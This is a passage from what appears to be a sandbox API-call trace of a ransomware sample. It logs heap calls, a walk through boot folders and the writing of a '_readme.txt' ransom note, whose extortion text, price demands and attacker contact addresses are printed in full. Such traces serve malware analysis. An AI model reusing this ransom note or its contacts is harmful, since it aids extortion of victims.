hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.644] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0201.644] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.644] PathFindFileNameW (pszPath="") returned="" [0201.644] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.645] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.645] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.645] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.645] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0201.645] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0201.646] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.646] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.646] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.646] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.646] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.646] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.646] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0201.646] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.646] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.647] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.647] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.647] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.650] RtlAllocateHeap (HeapHandle=0x2c0000, 